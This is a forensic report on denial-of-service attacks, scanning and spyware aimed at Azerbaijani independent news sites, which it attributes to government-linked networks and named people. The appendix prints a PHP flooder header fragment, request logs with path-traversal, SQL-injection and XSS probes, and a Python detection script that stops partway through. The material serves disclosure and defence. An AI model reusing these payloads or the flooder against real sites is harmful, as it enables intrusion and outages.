News media websites attacked from Governmental Infrastructure in Azerbaijan


Ministry of Communications and High Technologies (Azerbaijan)

10 March 2017, 00:01 UTC

Forensic evidence collected by VirtualRoad.org during the past six months shows how a dedicated group of cyber attackers is actively engaged in denial-of-service attacks, intrusion attempts, spear-phishing campaigns and electronic media monitoring from Internet infrastructure associated with the Government of Azerbaijan.

This report summarizes the findings that result from our efforts to repel and track the attacks. In January 2017, after tens of denial-of-service and penetration attempts, the same group started to use the infrastructure used by “AutoItSpy”, a home-grown malware designed to spy on and collect information from targeted human rights activists. These overlapping malicious activities can hardly be explained without considering the existence of a campaign designed to target dissenting voices in the country.

Denial of service attacks against independent media

An example of such a cyberattack took place on 12 January 2017, when the website www.abzas.net started to receive a series of application-layer denial-of-service attacks that lasted for eight days. For five consecutive days the website remained inaccessible, until it was finally migrated to VirtualRoad.org’s secure hosting infrastructure.

Our forensic investigation links the attackers of the news site abzas.net with other security events that we have been monitoring for the past six months. The attackers that targeted Abzas.net have also been active against other media websites from Azerbaijan, including cumhuriyyet.net and azadliq.info.

The attackers, who used compromised servers, the Tor network and “Zenmate” VPN services to orchestrate the traffic floods, left digital traces that link them with the IP network 85.132.24.0/24, and more specifically with the IP addresses 85.132.24.74 and 85.132.24.77.

In the same IP network, we can find several Azerbaijani governmental services, such as the Ministry of Foreign Affairs (tourvisa.mfa.gov.az @85.132.24.246), the mailserver of the Cabinet of Ministers (mail.cabmin.gov.az @85.132.24.82), and the mailserver of the Ministry of Transport (mail.mot.gov.az @85.132.24.51).

The most probable location of the attacker(s) is the premises of the Ministry of Transport (Tbilisi Avenue No. 1054, Baku, Azerbaijan), since the “non-automated attacks” always take place during office hours. During the writing of this report, we have been informed that on 13 February 2017 the Ministry of Transport was merged with the Ministry of Communications and High Technologies to form the new Ministry of Transport, Communications and High Technologies.

In reaction to our attempts to block the denial-of-service attacks, the source IP address changed from 85.132.24.74 to 85.132.24.77. Apart from attacking media sites, the same addresses are also used to provide access to the public Internet at the Ministry of Transport, from where legitimate readers visit the websites on a daily basis.

Also in January 2017, a very distinctive attack was launched against Abzas.net and Azadliq.info. Eleven dedicated servers, all closely connected with system administrators in Azerbaijan, were abused to launch a denial-of-service attack against these media sites. One of the servers used in the attack, with IP address 136.243.173.205, hosts the website of Hackathon Azerbaijan.

The site is hosted with Yer.az, a hosting company owned by Rashad Aliyev, a security professional with close ties to government-endorsed cyber-security activities. When we confronted Rashad Aliyev about the attacks and the compromised servers, he acknowledged that the traffic floods were sourced from his server, but argued that for privacy reasons he was not able to provide more details about the attacks or who might be behind them.

Monitoring and tracking of news sites

During our review of suspicious traffic patterns we also identified what seems to be a “customized service” that monitors and tracks multiple news sites in Azerbaijan. The service polled the news sites every 15 minutes. Most likely, this monitoring system was used to evaluate the success (or failure) of the denial-of-service attacks, as it could track when a site became unreachable and for how long.

Since VirtualRoad.org hosts several of the targeted sites, including Azadliq.info, we decided to block the monitoring system. To evade our blocking, the attackers changed the IP address of their system several times. However, on the morning of 6 January 2017, after several failed attempts to re-activate their monitoring system, the attackers decided to move the operation to a new IP address, namely 85.132.78.164.

IP address 85.132.78.164 – the connection with the “AutoItSpy” malware

During the review of the malicious activity associated with this specific address, we found several malware samples of what seemed to be a “homegrown spyware” exfiltrating data to the same location. Our findings overlap with the report of Amnesty International researchers about a malware dubbed “AutoItSpy”.

Our analysis of the malicious code also reveals that the attackers were collecting screenshots and logging keystrokes from the victims’ computers and submitting them to a server hosted at IP address 85.132.78.164.

Appendix – Forensic data

Below is the forensic data collected for the denial-of-service attacks, the monitoring system and the targeted malware campaign.

DDoS attacks

Azerbaijani-administered dedicated servers used to launch DDoS attacks

One interesting aspect of the DDoS attacks is the nature of the dedicated servers used to launch them. In most cases, attackers compromise random websites to plant persistent backdoors and the attack-generation code that lets them run web request floods while remaining untraceable. To our surprise, the attackers placed the malicious code on dedicated servers operated by other Azeri system administrators. This finding makes us believe that the attackers are close to the cybersecurity community in Azerbaijan.

CB-Prx Web Flooder from compromised site

One of the servers used for the attack hosted the website for the “Hackathon in Azerbaijan”

Faik Farmanov (IntraNS, TLD .az), Rashad Aliyev (Yer.az) at Hackathon Azerbaijan

Not novel attack code

The attack code used to launch the DDoS is written in PHP and is a modified version of the Punker2Bot PHP Flooder. An old version of the script is available here:

    // Request line: $ruta is the requested path, $dominio the target host
    $header = "GET ".$ruta." HTTP/1.1\r\n";
    $header .= "Host: ".$dominio."\r\n";
    $header .= "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16\r\n";
    $header .= "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,image/jpg,image/gif,*/*;q=0.5\r\n";
    $header .= "Accept-Language: es-es,es;q=0.8,en-us;q=0.5,en;q=0.3\r\n";
    $header .= "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n";
    $header .= "Keep-Alive: 310\r\n";
    $header .= "Proxy-Connection: keep-alive\r\n";
    $header .= "Referer: http://".$dominio.$ruta."\r\n";
    $header .= "Content-Type: application/x-www-form-urlencoded\r\n";
    // Spoofed client address; the real source is the compromised server
    $header .= "X-Forwarded-For: ".$ip_simulada."\r\n";
    // Fixed marker left by the flooder, usable as a detection signature
    $header .= "Via: CB-Prx\r\n";
    $header .= "Connection: Close\r\n\r\n";

Traffic Logs and Indicators from Web Flood Events (September 2016 – January 2017)

Attack on cumhuriyyet from 85.132.24.74 (GET Flood), 9–13 September 2016

85.132.24.74 - - [09/Sep/2016:10:59:51 +0000] GET / HTTP/1.1 200 149517 [203] - Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.84 Safari/537.36 AZ AS29049 International Communication Operator
85.132.24.74 - - [09/Sep/2016:23:52:30 +0000] GET / HTTP/1.1 403 635 [203] - Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.84 Safari/537.36 AZ AS29049 International Communication Operator
85.132.24.74 - - [13/Sep/2016:06:06:42 +0000] GET / HTTP/1.1 403 635 [203] - Mozilla/7.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.88 Safari/537.37 AZ AS29049 International Communication Operator

Attack on gununsesi from 85.132.24.74 (GET Flood), 17 September 2016

85.132.24.74 - - [17/Sep/2016:17:36:31 +0000] GET / HTTP/1.1 200 73563 [202] - Mozilla/7.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.88 Safari/537.37 AZ AS29049 International Communication Operator

Attack on cumhuriyyet from 85.132.24.74 (GET Flood), 17 September – 15 November 2016

85.132.24.74 - - [17/Sep/2016:19:51:24 +0000] GET / HTTP/1.1 403 635 [203] - Mozilla/7.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.88 Safari/537.37 AZ AS29049 International Communication Operator
85.132.24.74 - - [27/Oct/2016:06:10:42 +0000] GET / HTTP/1.1 200 153545 [203] - Mozilla/6.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.88 Safari/537.37 AZ AS29049 International Communication Operator
85.132.24.74 - - [11/Nov/2016:06:13:13 +0000] GET / HTTP/1.1 402 649 [203] - Mozilla/6.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.88 Safari/537.37 AZ AS29049 International Communication Operator -
85.132.24.74 - - [13/Nov/2016:06:10:15 +0000] GET / HTTP/1.1 403 635 [203] - Mozilla/6.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.88 Safari/537.37 AZ AS29049 International Communication Operator -
85.132.24.74 - - [15/Nov/2016:06:08:47 +0000] GET / HTTP/1.1 403 635 [203] - Mozilla/6.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.88 Safari/537.37 AZ AS29049 International Communication Operator -
85.132.24.74 - - [15/Nov/2016:21:16:43 +0000] GET / HTTP/1.1 403 232 [109] - Googlebot-News AZ AS29049 International Communication Operator -

Attack on gununsesi from Mirai GRE Traffic

On Sat, 19 Nov 2016 11:08:52 GMT, the Mirai command-and-control server 154.16.3.145 (q5f2k0evy7go2rax9m4g. dot ru) launched a GRE flood against gununsesi. The Mirai attack was followed by a layer 7 attack against the same site involving 1000 bots.

178.172.146.60 - - [19/Nov/2016:12:06:10 +0000] "GET /category/manset/ HTTP/1.1" 403 232 [429] "http://1boi142788p9.ua/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.843328; .NET CLR 3.5.843328; .NET CLR 3.0.843328" "---" "BY" "AS56498 ELSATBR-AS"

Pentesting of Azadliq from government server

Attack on azadliq from 85.132.24.74 (Pentesting Acunetix)

85.132.24.74 - - [11/Nov/2016:13:51:41 +0000] "GET /acunetix-wvs-test-for-some-inexistent-file HTTP/1.1" 404 9485 [286] "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21" 

85.132.24.74 - - [11/Nov/2016:14:02:51 +0000] "GET /?category=96&format=audio&month=01&s=(select%20convert(int%2cCHAR(65)))&year=2016 HTTP/1.1" 200 216 [528] "http://www.azadliq.info/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21"
85.132.24.74 - - [11/Nov/2016:14:02:51 +0000] "GET /?p=/%5c../%5c../%5c../%5c../%5c../%5c../%5c../etc/passwd HTTP/1.1" 301 248 [503] "http://www.azadliq.info/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21"
85.132.24.74 - - [11/Nov/2016:16:21:46 +0000] POST /xmlrpc.php HTTP/1.1 200 31 [160540] - Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21 AZ AS29049 International Communication Operator - 
85.132.24.74 - - [11/Nov/2016:16:21:49 +0000] POST /xmlrpc.php HTTP/1.1 200 31 [628] - Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21 AZ AS29049 International Communication Operator -
85.132.24.74 - - [11/Nov/2016:16:21:49 +0000] POST /xmlrpc.php HTTP/1.1 200 31 [646] - Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21 AZ AS29049 International Communication Operator -
85.132.24.74 - - [11/Nov/2016:16:21:49 +0000] POST /xmlrpc.php HTTP/1.1 200 31 [652] - Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21 AZ AS29049 International Communication Operator

Attack on azadliq from 85.132.24.77 (Pentesting Netsparker)

85.132.24.77 - - [12/Jan/2017:09:23:43 +0000] GET /?nsextt='%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Enetsparker(0x000128)%3C/scRipt%3E HTTP/1.1 303 295 [559] - Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.16 Safari/537.36 AZ AS29049 International Communication Operator -
85.132.24.77 - - [12/Jan/2017:09:23:45 +0000] GET /%3C?php%20echo%20chr(78).chr(69).chr(84).chr(83).chr(80).chr(65).chr(82).chr(75).chr(45).chr(80).chr(72).chr(80).chr(45).chr(48).chr(45).(44353702950%20(intval($_GET[997])*4567)).chr(45)%20?%3E HTTP/1.1 303 295 [665] - Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.16 Safari/537.36 AZ AS29049 International Communication Operator -
85.132.24.77 - - [12/Jan/2017:09:23:46 +0000] GET /?nsextt=%3cscRipt%3ens(0x000148)%3c%2fscRipt%3e HTTP/1.1 303 295 [519] - Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.16 Safari/537.36 AZ AS29049 International Communication Operator -
85.132.24.77 - - [12/Jan/2017:09:23:48 +0000] POST / HTTP/1.1 421 717 [771] - Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.16 Safari/537.36 AZ AS29049 International Communication Operator -
85.132.24.77 - - [12/Jan/2017:09:23:48 +0000] POST / HTTP/1.1 421 717 [786] - Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.16 Safari/537.36 AZ AS29049 International Communication Operator -
85.132.24.77 - - [12/Jan/2017:09:23:48 +0000] POST / HTTP/1.1 421 717 [817] - Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.16 Safari/537.36 AZ AS29049 International Communication Operator -
85.132.24.77 - - [12/Jan/2017:09:23:48 +0000] GET /?nsextt='%22@--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Enetsparker(0x000160)%3C/scRipt%3E HTTP/1.1 303 295 [560] - Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.16 Safari/537.36 AZ AS29049 International Communication Operator -
85.132.24.77 - - [12/Jan/2017:09:23:49 +0000] POST / HTTP/1.1 421 717 [877] - Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.16 Safari/537.36 AZ AS29049 International Communication Operator -
85.132.24.77 - - [12/Jan/2017:09:23:51 +0000] GET /wp-includes/?nsextt='%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Enetsparker(0x000162)%3C/scRipt%3E HTTP/1.1 303 295 [571] - Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.16 Safari/537.36 AZ AS29049 International Communication Operator -
85.132.24.77 - - [12/Jan/2017:09:23:51 +0000] GET /%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd HTTP/1.1 303 295 [548] - Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.16 Safari/537.36 AZ AS29049 International Communication Operator -
85.132.24.77 - - [12/Jan/2017:09:25:48 +0000] GET /wp-content/plugins/?nsextt='%22@--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Enetsparker(0x000AF2)%3C/scRipt%3E HTTP/1.1 303 295 [579] - Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.16 Safari/537.36 AZ AS29049 International Communication Operator -
85.132.24.77 - - [12/Jan/2017:09:25:50 +0000] GET /wp-content/plugins/'%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Enetsparker(0x000B1C)%3C/scRipt%3E HTTP/1.1 303 295 [570] - Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.16 Safari/537.36 AZ AS29049 International Communication Operator -
85.132.24.77 - - [12/Jan/2017:09:25:51 +0000] GET /wp-content/plugins/'%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Enetsparker(0x000B1E)%3C/scRipt%3E HTTP/1.1 303 295 [570] - Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.16 Safari/537.36 AZ AS29049 International Communication Operator -
85.132.24.77 - - [12/Jan/2017:09:25:51 +0000] GET /wp-content/plugins/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd HTTP/1.1 303 295 [567] - Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.16 Safari/537.36 AZ AS29049 International Communication Operator -
85.132.24.77 - - [12/Jan/2017:09:25:52 +0000] GET /wp-content/plugins/%22ns=%22netsparker(0x000B28) HTTP/1.1 303 295 [520] - Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.16 Safari/537.36 AZ AS29049 International Communication Operator -

Botnet Attacks against abzas.net and azadliq.info

Attacks against azadliq.info and abzas.net 12-20 January 2017

136.243.173.205 - - [16/Jan/2017:10:17:57 +0000] "GET /index.php?s=999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999957670 HTTP/1.1" 301 311 [2627] 
"http://azadliq.info/index.php?s=999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999957670" "Mozilla/5.0 (Windows; U; Windows NT 9.3; ru-ru; rv:1.8.1.16) Gecko/20080702 Firefox/Array.0.0.16" "---" "DE" "AS24940 HETZNER-AS"

Eleven different IPs were involved in the “99999” attacks against the two sites; nine of them appear in both lists.

Azadliq.info attack IPs

108.167.189.55
136.243.173.205 www.ctf.hackathonazerbaijan.org
178.208.79.65
178.213.128.22 Armenian Hosting
194.28.86.7
46.17.44.207 azedupress.com
5.9.87.83 ann.az ain.az
66.147.240.195
78.46.187.22

Abzas.net attack IPs from 12-16 January (old hosting)

108.167.189.55
136.243.173.205 Yer Hosting
178.208.79.65
178.63.54.197 Technote Media Hosting
194.28.86.7
46.17.44.207
5.9.87.83 Technote Media Hosting
66.147.240.195
78.46.187.22

78.46.187.22 - - [20/Jan/2017:14:02:56 +0000] "GET /index.php?s=9999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999
 99999999999999999999999999999999999999999999999999999999999999999925763 HTTP/1.1" 301 248 [2617] "http://abzas.net/index.php?s=999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999
 999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999925763" "Mozilla/5.0 (Windows; U; Windows NT 9.3; ru-ru; rv:1.8.1.16) Gecko/20080702 Firefox/Array.0.0.16

Monitoring and tracking news sites

Blocking of monitoring IP address

The monitoring system changed from 85.132.24.74 to 85.132.24.77 after the first address was blocked.

85.132.24.74 - - [28/Dec/2016:14:00:19 +0000] "GET / HTTP/1.1" 301 311 [223] "-" "Mozilla/5.0 (Windows NT 6.1; rv:8.0) Gecko/20160313 Firefox/8.0"
85.132.24.74 - - [28/Dec/2016:14:00:19 +0000] "GET / HTTP/1.1" 302 287 [258] "http://azadliq.info/" "Mozilla/5.0 (Windows NT 6.1; rv:8.0) Gecko/20160313 Firefox/8.0"
85.132.24.74 - - [28/Dec/2016:14:15:14 +0000] "GET / HTTP/1.1" 301 311 [223] "-" "Mozilla/5.0 (Windows NT 6.1; rv:8.0) Gecko/20160313 Firefox/8.0"
85.132.24.74 - - [28/Dec/2016:14:15:14 +0000] "GET / HTTP/1.1" 302 287 [258] "http://azadliq.info/" "Mozilla/5.0 (Windows NT 6.1; rv:8.0) Gecko/20160313 Firefox/8.0"
85.132.24.77 - - [28/Dec/2016:14:30:13 +0000] "GET / HTTP/1.1" 301 311 [223] "-" "Mozilla/5.0 (Windows NT 6.1; rv:8.0) Gecko/20160313 Firefox/8.0"
85.132.24.77 - - [28/Dec/2016:14:30:13 +0000] "GET / HTTP/1.1" 302 287 [258] "http://azadliq.info/" "Mozilla/5.0 (Windows NT 6.1; rv:8.0) Gecko/20160313 Firefox/8.0"
85.132.24.77 - - [28/Dec/2016:14:45:12 +0000] "GET / HTTP/1.1" 301 311 [223] "-" "Mozilla/5.0 (Windows NT 6.1; rv:8.0) Gecko/20160313 Firefox/8.0"
85.132.24.77 - - [28/Dec/2016:14:45:12 +0000] "GET / HTTP/1.1" 302 287 [258] "http://azadliq.info/" "Mozilla/5.0 (Windows NT 6.1; rv:8.0) Gecko/20160313 Firefox/8.0"

The monitoring system then moved to a new IP range: the network where mail.surakhani-oil.com and safa.az are hosted. This network is directly connected to the AZ-IX internet exchange via DeltaTelecom-CustomersGW-link-for-INTERNET-Xchange.az-ix.net and in the past hosted the VPN service of az-ix.net (vpn.az-ix.net, 85.132.78.130).

85.132.24.77 - - [06/Jan/2017:09:30:02 +0000] "GET / HTTP/1.1" 303 295 [303] "http://azadliq.info/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36"
85.132.24.77 - - [06/Jan/2017:09:45:04 +0000] "GET / HTTP/1.1" 303 295 [303] "http://azadliq.info/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36"
85.132.24.77 - - [06/Jan/2017:10:00:14 +0000] "GET / HTTP/1.1" 303 295 [303] "http://azadliq.info/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36"
85.132.78.164 - - [06/Jan/2017:10:15:56 +0000] "GET / HTTP/1.1" 303 295 [260] "-" "Mozilla/4.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/5.0)"
85.132.78.164 - - [06/Jan/2017:10:16:30 +0000] "GET / HTTP/1.1" 303 295 [260] "-" "Mozilla/4.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/5.0)"

The same network was actively pentesting Azadliq.info in April 2016

85.132.78.162 - - [05/Apr/2016:13:02:02 +0000]  "GET /leftnav_bot/ HTTP/1.0" 403 221 [357] "-" "DirBuster-0.12 (http://www.owasp.org/index.php/Category:OWASP_DirBuster_Project)" 
85.132.78.162 - - [05/Apr/2016:13:02:02 +0000]  "GET /1466/ HTTP/1.0" 403 221 [350] "-" "DirBuster-0.12 (http://www.owasp.org/index.php/Category:OWASP_DirBuster_Project)"
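Each of the three patterns in the log excerpts above has a log-level signature: the Acunetix, Netsparker and DirBuster probes identify themselves in the path or user agent, the “99999” flood carries a query string thousands of characters long, and the monitoring system returns at a fixed 15-minute cadence even while its source IP changes. The following Python is an added example, not the report's own tooling; its log lines are constructed to the same layout as the excerpts (user agents abbreviated), and the IP-handoff check and the 1024-byte query threshold are this example's own heuristics.

```python
import re
import statistics
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import unquote, urlsplit

# Access-log entries constructed for this example: same field layout as the
# report's logs (combined format), user agents abbreviated for width.
SAMPLE_LINES = [
    '85.132.24.74 - - [11/Nov/2016:13:51:41 +0000] "GET /acunetix-wvs-test-for-some-inexistent-file HTTP/1.1" 404 9485 "-" "Mozilla/5.0 Chrome/41.0.2228.0"',
    '85.132.24.74 - - [11/Nov/2016:14:02:51 +0000] "GET /?p=/%5c../%5c../%5c../etc/passwd HTTP/1.1" 301 248 "http://www.azadliq.info/" "Mozilla/5.0 Chrome/41.0.2228.0"',
    '85.132.24.77 - - [12/Jan/2017:09:23:43 +0000] "GET /?nsextt=%27%22--%3E%3CscRipt%3Enetsparker(0x000128)%3C/scRipt%3E HTTP/1.1" 303 295 "-" "Mozilla/5.0 Chrome/41.0.2272.16"',
    '85.132.78.162 - - [05/Apr/2016:13:02:02 +0000] "GET /leftnav_bot/ HTTP/1.0" 403 221 "-" "DirBuster-0.12 (http://www.owasp.org/index.php/Category:OWASP_DirBuster_Project)"',
    # the "99999" flood: a query string thousands of characters long
    '136.243.173.205 - - [16/Jan/2017:10:17:57 +0000] "GET /index.php?s=' + "9" * 2000 + '57670 HTTP/1.1" 301 311 "-" "Mozilla/5.0 Firefox/Array.0.0.16"',
    # the monitoring system: one request every ~15 minutes, changing source IP
    '85.132.24.74 - - [28/Dec/2016:14:00:19 +0000] "GET / HTTP/1.1" 301 311 "-" "Mozilla/5.0 Firefox/8.0"',
    '85.132.24.74 - - [28/Dec/2016:14:15:14 +0000] "GET / HTTP/1.1" 301 311 "-" "Mozilla/5.0 Firefox/8.0"',
    '85.132.24.77 - - [28/Dec/2016:14:30:13 +0000] "GET / HTTP/1.1" 301 311 "-" "Mozilla/5.0 Firefox/8.0"',
    '85.132.24.77 - - [28/Dec/2016:14:45:12 +0000] "GET / HTTP/1.1" 301 311 "-" "Mozilla/5.0 Firefox/8.0"',
    '85.132.24.77 - - [06/Jan/2017:09:30:02 +0000] "GET / HTTP/1.1" 303 295 "http://azadliq.info/" "Mozilla/5.0 Chrome/50.0.2661.94"',
    '85.132.24.77 - - [06/Jan/2017:09:45:04 +0000] "GET / HTTP/1.1" 303 295 "http://azadliq.info/" "Mozilla/5.0 Chrome/50.0.2661.94"',
    '85.132.24.77 - - [06/Jan/2017:10:00:14 +0000] "GET / HTTP/1.1" 303 295 "http://azadliq.info/" "Mozilla/5.0 Chrome/50.0.2661.94"',
    '85.132.78.164 - - [06/Jan/2017:10:15:56 +0000] "GET / HTTP/1.1" 303 295 "-" "Mozilla/4.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/5.0)"',
]

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# Fingerprints of the scanners and probes seen in the report's logs.
SIGNATURES = {
    "Acunetix": re.compile(r"acunetix", re.I),
    "Netsparker": re.compile(r"netsparker|nsextt=", re.I),
    "DirBuster": re.compile(r"DirBuster"),
    "traversal": re.compile(r"\.\./|/etc/passwd", re.I),
}
MAX_QUERY_LEN = 1024  # example threshold: longer query strings are flagged


def parse_log(lines):
    """Parse combined-format lines into dicts with a timezone-aware datetime."""
    entries = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line: skip rather than abort the run
        e = m.groupdict()
        e["time"] = datetime.strptime(e.pop("ts"), "%d/%b/%Y:%H:%M:%S %z")
        entries.append(e)
    return entries


def classify_request(e):
    """Return the sorted list of signature names matching one entry."""
    decoded = unquote(e["path"])  # match on the decoded path (%5c -> backslash)
    tags = {name for name, rx in SIGNATURES.items()
            if rx.search(decoded) or rx.search(e["ua"])}
    if len(urlsplit(e["path"]).query) > MAX_QUERY_LEN:
        tags.add("oversized-query")
    return sorted(tags)


def find_periodic_pollers(entries, min_hits=3, tolerance=60):
    """Group hits by (user agent, path); keep groups whose inter-arrival gaps
    all lie within `tolerance` seconds of their median, i.e. a fixed cadence."""
    groups = defaultdict(list)
    for e in entries:
        groups[(e["ua"], e["path"])].append(e)
    pollers = []
    for (ua, path), hits in groups.items():
        if len(hits) < min_hits:
            continue
        times = sorted(h["time"] for h in hits)
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        period = statistics.median(gaps)
        if period >= 60 and all(abs(g - period) <= tolerance for g in gaps):
            pollers.append({"ua": ua, "path": path, "period": period,
                            "ips": sorted({h["ip"] for h in hits}),
                            "last": times[-1]})
    return pollers


def find_handoffs(entries, pollers, tolerance=60):
    """A request to a poller's path from an IP outside its group, landing one
    period after the group's last hit: the cadence resumed from a new address."""
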